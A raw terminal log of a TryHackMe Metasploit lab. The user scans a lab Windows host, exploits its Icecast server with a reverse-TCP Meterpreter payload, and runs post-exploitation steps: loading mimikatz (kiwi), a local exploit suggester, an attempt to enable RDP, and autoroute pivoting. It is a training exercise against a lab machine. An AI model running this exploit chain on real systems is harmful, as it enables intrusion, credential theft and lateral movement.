┌──(anonymous㉿Unknown)-[~]
└─$ sudo openvpn /home/anonymous/Works/TryHackMe/AbdulRahimK.ovpn
2022-04-17 00:33:27 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set.
2022-04-17 00:33:27 DEPRECATED OPTION: --cipher set to 'AES-256-CBC' but missing in --data-ciphers (AES-256-GCM:AES-128-GCM). Future OpenVPN version will ignore --cipher for cipher negotiations. Add 'AES-256-CBC' to --data-ciphers or change --cipher 'AES-256-CBC' to --data-ciphers-fallback 'AES-256-CBC' to silence this warning.
2022-04-17 00:33:27 OpenVPN 2.5.6 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Mar 20 2022
2022-04-17 00:33:27 library versions: OpenSSL 1.1.1n  15 Mar 2022, LZO 2.10
2022-04-17 00:33:27 Outgoing Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication
2022-04-17 00:33:27 Incoming Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication
2022-04-17 00:33:27 TCP/UDP: Preserving recently used remote address: [AF_INET]18.202.129.195:1194
2022-04-17 00:33:27 Socket Buffers: R=[212992->212992] S=[212992->212992]
2022-04-17 00:33:27 UDP link local: (not bound)
2022-04-17 00:33:27 UDP link remote: [AF_INET]18.202.129.195:1194
2022-04-17 00:33:28 TLS: Initial packet from [AF_INET]18.202.129.195:1194, sid=be32cce0 0adbc7d0
2022-04-17 00:33:28 VERIFY OK: depth=1, CN=ChangeMe
2022-04-17 00:33:28 VERIFY KU OK
2022-04-17 00:33:28 Validating certificate extended key usage
2022-04-17 00:33:28 ++ Certificate has EKU (str) TLS Web Server Authentication, expects TLS Web Server Authentication
2022-04-17 00:33:28 VERIFY EKU OK
2022-04-17 00:33:28 VERIFY OK: depth=0, CN=server
2022-04-17 00:33:28 Control Channel: TLSv1.3, cipher TLSv1.3 TLS_AES_256_GCM_SHA384, peer certificate: 2048 bit RSA, signature: RSA-SHA256
2022-04-17 00:33:28 [server] Peer Connection Initiated with [AF_INET]18.202.129.195:1194
2022-04-17 00:33:29 SENT CONTROL [server]: 'PUSH_REQUEST' (status=1)
2022-04-17 00:33:30 PUSH: Received control message: 'PUSH_REPLY,route 10.10.0.0 255.255.0.0,route-metric 1000,comp-lzo no,route-gateway 10.8.0.1,topology subnet,ping 5,ping-restart 120,ifconfig 10.8.73.220 255.255.0.0,peer-id 48'
2022-04-17 00:33:30 OPTIONS IMPORT: timers and/or timeouts modified
2022-04-17 00:33:30 OPTIONS IMPORT: compression parms modified
2022-04-17 00:33:30 OPTIONS IMPORT: --ifconfig/up options modified
2022-04-17 00:33:30 OPTIONS IMPORT: route options modified
2022-04-17 00:33:30 OPTIONS IMPORT: route-related options modified
2022-04-17 00:33:30 OPTIONS IMPORT: peer-id set
2022-04-17 00:33:30 OPTIONS IMPORT: adjusting link_mtu to 1625
2022-04-17 00:33:30 Using peer cipher 'AES-256-CBC'
2022-04-17 00:33:30 Outgoing Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key
2022-04-17 00:33:30 Outgoing Data Channel: Using 512 bit message hash 'SHA512' for HMAC authentication
2022-04-17 00:33:30 Incoming Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key
2022-04-17 00:33:30 Incoming Data Channel: Using 512 bit message hash 'SHA512' for HMAC authentication
2022-04-17 00:33:30 net_route_v4_best_gw query: dst 0.0.0.0
2022-04-17 00:33:30 net_route_v4_best_gw result: via 192.168.1.1 dev eth0
2022-04-17 00:33:30 ROUTE_GATEWAY 192.168.1.1/255.255.255.0 IFACE=eth0 HWADDR=00:50:56:21:88:bb
2022-04-17 00:33:30 TUN/TAP device tun0 opened
2022-04-17 00:33:30 net_iface_mtu_set: mtu 1500 for tun0
2022-04-17 00:33:30 net_iface_up: set tun0 up
2022-04-17 00:33:30 net_addr_v4_add: 10.8.73.220/16 dev tun0
2022-04-17 00:33:30 net_route_v4_add: 10.10.0.0/16 via 10.8.0.1 dev [NULL] table 0 metric 1000
2022-04-17 00:33:30 WARNING: this configuration may cache passwords in memory -- use the auth-nocache option to prevent this
2022-04-17 00:33:30 Initialization Sequence Completed

====================================================================================================================
┌──(root㉿Unknown)-[/home/anonymous]
└─# msfdb init
[+] Starting database
[+] Creating database user 'msf'
[+] Creating databases 'msf'
[+] Creating databases 'msf_test'
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema

====================================================================================================================
┌──(root㉿Unknown)-[/home/anonymous]
└─# msfconsole -h
Usage: msfconsole [options]

Common options:
    -E, --environment ENVIRONMENT    Set Rails environment, defaults to RAIL_ENV environment variable or 'production'

Database options:
    -M, --migration-path DIRECTORY   Specify a directory containing additional DB migrations
    -n, --no-database                Disable database support
    -y, --yaml PATH                  Specify a YAML file containing database settings

Framework options:
    -c FILE                          Load the specified configuration file
    -v, -V, --version                Show version

Module options:
        --defer-module-loads         Defer module loading unless explicitly asked
    -m, --module-path DIRECTORY      Load an additional module path

Console options:
    -a, --ask                        Ask before exiting Metasploit or accept 'exit -y'
    -H, --history-file FILE          Save command history to the specified file
    -l, --logger STRING              Specify a logger to use (Stdout, TimestampColorlessFlatfile, Flatfile, StdoutWithoutTimestamps, Stderr)
    -L, --real-readline              Use the system Readline library instead of RbReadline
    -o, --output FILE                Output to the specified file
    -p, --plugin PLUGIN              Load a plugin on startup
    -q, --quiet                      Do not print the banner on startup
    -r, --resource FILE              Execute the specified resource file (- for stdin)
    -x, --execute-command COMMAND    Execute the specified console commands (use ; for multiples)
    -h, --help                       Show this message

=================================================================================================================== 
┌──(root㉿Unknown)-[/home/anonymous]
└─# msfconsole   
                                                  

 ______________________________________________________________________________
|                                                                              |
|                          3Kom SuperHack II Logon                             |
|______________________________________________________________________________|
|                                                                              |
|                                                                              |
|                                                                              |
|                 User Name:          [   security    ]                        |
|                                                                              |
|                 Password:           [               ]                        |
|                                                                              |
|                                                                              |
|                                                                              |
|                                   [ OK ]                                     |
|______________________________________________________________________________|
|                                                                              |
|                                                       https://metasploit.com |
|______________________________________________________________________________|


       =[ metasploit v6.1.27-dev                          ]
+ -- --=[ 2196 exploits - 1162 auxiliary - 400 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Metasploit can be configured at startup, see 
msfconsole --help to learn more

msf6 > 

===================================================================================================================
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
msf6 > 

===================================================================================================================
msf6 > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host
    debug         Display information useful for debugging
    exit          Exit the console
    features      Display the list of not yet released features that can be opted in to
    get           Gets the value of a context-specific variable
    getg          Gets the value of a global variable
    grep          Grep the output of another command
    help          Help menu
    history       Show command history
    load          Load a framework plugin
    quit          Exit the console
    repeat        Repeat a list of commands
    route         Route traffic through a session
    save          Saves the active datastores
    sessions      Dump session listings and display information about sessions
    set           Sets a context-specific variable to a value
    setg          Sets a global variable to a value
    sleep         Do nothing for the specified number of seconds
    spool         Write console output into a file as well the screen
    threads       View and manipulate background threads
    tips          Show a list of useful productivity tips
    unload        Unload a framework plugin
    unset         Unsets one or more context-specific variables
    unsetg        Unsets one or more global variables
    version       Show the framework and console library version numbers


Module Commands
===============

    Command       Description
    -------       -----------
    advanced      Displays advanced options for one or more modules
    back          Move back from the current context
    clearm        Clear the module stack
    favorite      Add module(s) to the list of favorite modules
    info          Displays information about one or more modules
    listm         List the module stack
    loadpath      Searches for and loads modules from a path
    options       Displays global options or for one or more modules
    popm          Pops the latest module off the stack and makes it active
    previous      Sets the previously loaded module as the current module
    pushm         Pushes the active or list of modules onto the module stack
    reload_all    Reloads all modules from all defined module paths
    search        Searches module names and descriptions
    show          Displays modules of a given type, or all modules
    use           Interact with a module by name or search term/index


Job Commands
============

    Command       Description
    -------       -----------
    handler       Start a payload handler as job
    jobs          Displays and manages jobs
    kill          Kill a job
    rename_job    Rename a job


Resource Script Commands
========================

    Command       Description
    -------       -----------
    makerc        Save commands entered since start to a file
    resource      Run the commands stored in a file


Database Backend Commands
=========================

    Command           Description
    -------           -----------
    analyze           Analyze database information about a specific address or address range
    db_connect        Connect to an existing data service
    db_disconnect     Disconnect from the current data service
    db_export         Export a file containing the contents of the database
    db_import         Import a scan result file (filetype will be auto-detected)
    db_nmap           Executes nmap and records the output automatically
    db_rebuild_cache  Rebuilds the database-stored module cache (deprecated)
    db_remove         Remove the saved data service entry
    db_save           Save the current data service connection as the default to reconnect on startup
    db_status         Show the current data service status
    hosts             List all hosts in the database
    loot              List all loot in the database
    notes             List all notes in the database
    services          List all services in the database
    vulns             List all vulnerabilities in the database
    workspace         Switch between database workspaces


Credentials Backend Commands
============================

    Command       Description
    -------       -----------
    creds         List all credentials in the database


Developer Commands
==================

    Command       Description
    -------       -----------
    edit          Edit the current module or a file with the preferred editor
    irb           Open an interactive Ruby shell in the current context
    log           Display framework.log paged to the end if possible
    pry           Open the Pry debugger on the current module or Framework
    reload_lib    Reload Ruby library files from specified paths
    time          Time how long it takes to run a particular command


msfconsole
==========

`msfconsole` is the primary interface to Metasploit Framework. There is quite a
lot that needs go here, please be patient and keep an eye on this space!

Building ranges and lists
-------------------------

Many commands and options that take a list of things can use ranges to avoid
having to manually list each desired thing. All ranges are inclusive.

### Ranges of IDs

Commands that take a list of IDs can use ranges to help. Individual IDs must be
separated by a `,` (no space allowed) and ranges can be expressed with either
`-` or `..`.

### Ranges of IPs

There are several ways to specify ranges of IP addresses that can be mixed
together. The first way is a list of IPs separated by just a ` ` (ASCII space),
with an optional `,`. The next way is two complete IP addresses in the form of
`BEGINNING_ADDRESS-END_ADDRESS` like `127.0.1.44-127.0.2.33`. CIDR
specifications may also be used, however the whole address must be given to
Metasploit like `127.0.0.0/8` and not `127/8`, contrary to the RFC.
Additionally, a netmask can be used in conjunction with a domain name to
dynamically resolve which block to target. All these methods work for both IPv4
and IPv6 addresses. IPv4 addresses can also be specified with special octet
ranges from the [NMAP target
specification](https://nmap.org/book/man-target-specification.html)

### Examples

Terminate the first sessions:

    sessions -k 1

Stop some extra running jobs:

    jobs -k 2-6,7,8,11..15

Check a set of IP addresses:

    check 127.168.0.0/16, 127.0.0-2.1-4,15 127.0.0.255

Target a set of IPv6 hosts:

    set RHOSTS fe80::3990:0000/110, ::1-::f0f0

Target a block from a resolved domain name:

    set RHOSTS www.example.test/24
msf6 > 

===================================================================================================================
msf6 > banner
 ______________________________________
/ it looks like you're trying to run a \
\ module                               /
 --------------------------------------
 \
  \
     __
    /  \
    |  |
    @  @
    |  |
    || |/
    || ||
    |\_/|
    \___/


       =[ metasploit v6.1.27-dev                          ]
+ -- --=[ 2196 exploits - 1162 auxiliary - 400 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Tired of setting RHOSTS for modules? Try 
globally setting it with setg RHOSTS x.x.x.x

msf6 >
===================================================================================================================
msf6 > get
Usage: get var1 [var2 ...]

The get command is used to get the value of one or more variables.

msf6 > 
===================================================================================================================
START THE MACHINE: MACHINE IP: 10.10.26.121

msf6 > db_nmap -sV 10.10.26.121
[*] Nmap: Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-17 06:01 EDT
[*] Nmap: Nmap scan report for 10.10.26.121
[*] Nmap: Host is up (0.17s latency).
[*] Nmap: Not shown: 989 closed tcp ports (reset)
[*] Nmap: PORT      STATE SERVICE      VERSION
[*] Nmap: 135/tcp   open  msrpc        Microsoft Windows RPC
[*] Nmap: 139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
[*] Nmap: 3389/tcp  open  tcpwrapped
[*] Nmap: 5357/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
[*] Nmap: 49152/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 49153/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 49154/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 49158/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 49159/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 49160/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 80.24 seconds

===================================================================================================================
msf6 > hosts

Hosts
=====

address       mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------       ---  ----  -------  ---------  -----  -------  ----  --------
10.10.26.121             Unknown                    device

===================================================================================================================
msf6 > services
Services
========

host          port   proto  name          state  info
----          ----   -----  ----          -----  ----
10.10.26.121  135    tcp    msrpc         open   Microsoft Windows RPC
10.10.26.121  139    tcp    netbios-ssn   open   Microsoft Windows netbios-ssn
10.10.26.121  445    tcp    microsoft-ds  open   Microsoft Windows 7 - 10 microsoft-ds workgroup: WORKGROUP
10.10.26.121  3389   tcp    tcpwrapped    open
10.10.26.121  5357   tcp    http          open   Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
10.10.26.121  49152  tcp    msrpc         open   Microsoft Windows RPC
10.10.26.121  49153  tcp    msrpc         open   Microsoft Windows RPC
10.10.26.121  49154  tcp    msrpc         open   Microsoft Windows RPC
10.10.26.121  49158  tcp    msrpc         open   Microsoft Windows RPC
10.10.26.121  49159  tcp    msrpc         open   Microsoft Windows RPC
10.10.26.121  49160  tcp    msrpc         open   Microsoft Windows RPC

===================================================================================================================
msf6 > vulns

Vulnerabilities
===============

Timestamp  Host  Name  References
---------  ----  ----  ----------

===================================================================================================================
msf6 > use icecast
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/http/icecast_header  2004-09-28       great  No     Icecast Header Overwrite


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/icecast_header

[*] Using exploit/windows/http/icecast_header
msf6 exploit(windows/http/icecast_header) > 

===================================================================================================================
msf6 exploit(windows/http/icecast_header) > search multi/handler

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank       Check  Description
   -  ----                                                 ---------------  ----       -----  -----------
   0  exploit/linux/local/apt_package_manager_persistence  1999-03-09       excellent  No     APT Package Manager Persistence
   1  exploit/android/local/janus                          2017-07-31       manual     Yes    Android Janus APK Signature bypass
   2  auxiliary/scanner/http/apache_mod_cgi_bash_env       2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
   3  exploit/linux/local/bash_profile_persistence         1989-06-08       normal     No     Bash Profile Persistence
   4  exploit/linux/local/desktop_privilege_escalation     2014-08-07       excellent  Yes    Desktop Linux Password Stealer and Privilege Escalation
   5  exploit/multi/handler                                                 manual     No     Generic Payload Handler
   6  exploit/windows/mssql/mssql_linkcrawler              2000-01-01       great      No     Microsoft SQL Server Database Link Crawling Command Execution
   7  exploit/windows/browser/persits_xupload_traversal    2009-09-29       excellent  No     Persits XUpload ActiveX MakeHttpRequest Directory Traversal
   8  exploit/linux/local/yum_package_manager_persistence  2003-12-17       excellent  No     Yum Package Manager Persistence


Interact with a module by name or index. For example info 8, use 8 or use exploit/linux/local/yum_package_manager_persistence

===================================================================================================================
msf6 exploit(windows/http/icecast_header) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/icecast_header) > 
msf6 exploit(windows/http/icecast_header) > set LHOST 10.8.73.220
LHOST => 10.8.73.220
msf6 exploit(windows/http/icecast_header) > set RHOSTS 10.10.26.121
RHOSTS => 10.10.26.121
===================================================================================================================
msf6 exploit(windows/http/icecast_header) > exploit

[*] Started reverse TCP handler on 10.8.73.220:4444 
[*] Sending stage (175174 bytes) to 10.10.26.121
[*] Meterpreter session 1 opened (10.8.73.220:4444 -> 10.10.26.121:49190 ) at 2022-04-17 06:15:43 -0400

meterpreter > 

===================================================================================================================
msf6 exploit(windows/http/icecast_header) > sessions

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  2         meterpreter x86/windows  Dark-PC\Dark @ DARK-PC  10.8.73.220:4444 -> 10.10.26.121:49199  (10.10.26.121)

===================================================================================================================

msf6 exploit(windows/http/icecast_header) > ps
[*] exec: ps

    PID TTY          TIME CMD
  29151 pts/2    00:00:00 su
  29168 pts/2    00:00:01 zsh
  93052 pts/2    00:00:11 ruby
  94986 pts/2    00:00:00 ps

===================================================================================================================
meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session  User          Path
 ---   ----  ----                  ----  -------  ----          ----
 0     0     [System Process]
 4     0     System
 416   4     smss.exe
 488   692   vds.exe
 544   536   csrss.exe
 548   692   svchost.exe
 584   692   svchost.exe
 592   536   wininit.exe
 604   584   csrss.exe
 652   584   winlogon.exe
 692   592   services.exe
 700   592   lsass.exe
 708   592   lsm.exe
 796   544   conhost.exe
 816   692   svchost.exe
 884   692   svchost.exe
 932   692   svchost.exe
 1020  692   svchost.exe
 1040  692   svchost.exe
 1068  692   sppsvc.exe
 1136  692   svchost.exe
 1260  692   spoolsv.exe
 1324  692   svchost.exe
 1428  692   taskhost.exe          x64   1        Dark-PC\Dark  C:\Windows\System32\taskhost.exe
 1516  692   amazon-ssm-agent.exe
 1556  1020  dwm.exe               x64   1        Dark-PC\Dark  C:\Windows\System32\dwm.exe
 1592  1536  explorer.exe          x64   1        Dark-PC\Dark  C:\Windows\explorer.exe
 1708  692   LiteAgent.exe
 1752  692   svchost.exe
 1800  816   WmiPrvSE.exe
 1892  692   Ec2Config.exe
 2104  692   svchost.exe
 2132  692   TrustedInstaller.exe
 2304  1592  Icecast2.exe          x86   1        Dark-PC\Dark  C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
 2444  692   taskhost.exe          x64   1
 2536  604   conhost.exe           x64   1
 2540  692   SearchIndexer.exe
 2692  816   rundll32.exe          x64   1        Dark-PC\Dark  C:\Windows\System32\rundll32.exe
 2736  2692  dinotify.exe          x64   1        Dark-PC\Dark  C:\Windows\System32\dinotify.exe
 2908  2444  WinSAT.exe            x64   1
 3044  1020  Defrag.exe

===================================================================================================================
meterpreter > migrate -N spoolsv.exe
[*] Migrating from 2304 to 1260...
[-] Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insufficient privileges)
meterpreter > 


===================================================================================================================
meterpreter > getuid
Server username: Dark-PC\Dark

===================================================================================================================
meterpreter > sysinfo
Computer        : DARK-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

===================================================================================================================
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x86/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

[!] Loaded x86 Kiwi on an x64 architecture.

Success.
meterpreter > 

===================================================================================================================
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > 

===================================================================================================================
meterpreter > ipconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 12
============
Name         : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:a0a:1a79
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 13
============
Name         : AWS PV Network Device #0
Hardware MAC : 02:c7:9e:0d:c3:7d
MTU          : 9001
IPv4 Address : 10.10.26.121
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::6dd5:c366:9b8b:89e
IPv6 Netmask : ffff:ffff:ffff:ffff::

meterpreter > 
===================================================================================================================
meterpreter > run post/windows/gather/checkvm

[*] Checking if the target is a Virtual Machine ...
[+] This is a Xen Virtual Machine
meterpreter > 

===================================================================================================================
meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.10.26.121 - Collecting local exploits for x86/windows...
[*] 10.10.26.121 - 40 exploit checks are being tried...
[+] 10.10.26.121 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[-] 10.10.26.121 - Post interrupted by the console user
===================================================================================================================
meterpreter > run post/windows/manage/enable_rdp

[-] Insufficient privileges, Remote Desktop Service was not modified
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20220417063939_default_10.10.26.121_host.windows.cle_097617.txt
meterpreter > 

===================================================================================================================
meterpreter > shell
Process 3616 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files (x86)\Icecast2 Win32>

===================================================================================================================
meterpreter > run autoroute -h

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Usage:   run autoroute [-r] -s subnet -n netmask
[*] Examples:
[*]   run autoroute -s 10.1.1.0 -n 255.255.255.0  # Add a route to 10.10.10.1/255.255.255.0
[*]   run autoroute -s 10.10.10.1                 # Netmask defaults to 255.255.255.0
[*]   run autoroute -s 10.10.10.1/24              # CIDR notation is also okay
[*]   run autoroute -p                            # Print active routing table
[*]   run autoroute -d -s 10.10.10.1              # Deletes the 10.10.10.1/255.255.255.0 route
[*] Use the "route" and "ipconfig" Meterpreter commands to learn about available routes
[-] Deprecation warning: This script has been replaced by the post/multi/manage/autoroute module

===================================================================================================================
meterpreter > run autoroute -s 172.18.1.0 -n 255.255.255.0

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 172.18.1.0/255.255.255.0...
[+] Added route to 172.18.1.0/255.255.255.0 via 10.10.26.121
[*] Use the -p option to list all active routes

===================================================================================================================
msf6 exploit(windows/http/icecast_header) > proxychains
[*] exec: proxychains


Usage:  proxychains -q -f config_file program_name [arguments]
        -q makes proxychains quiet - this overrides the config setting
        -f allows one to manually specify a configfile to use
        for example : proxychains telnet somehost.com
More help in README file

msf6 exploit(windows/http/icecast_header) > 

===================================================================================================================

https://tryhackme.com/p/USERNAME?show_achievement_badge=metasploitable

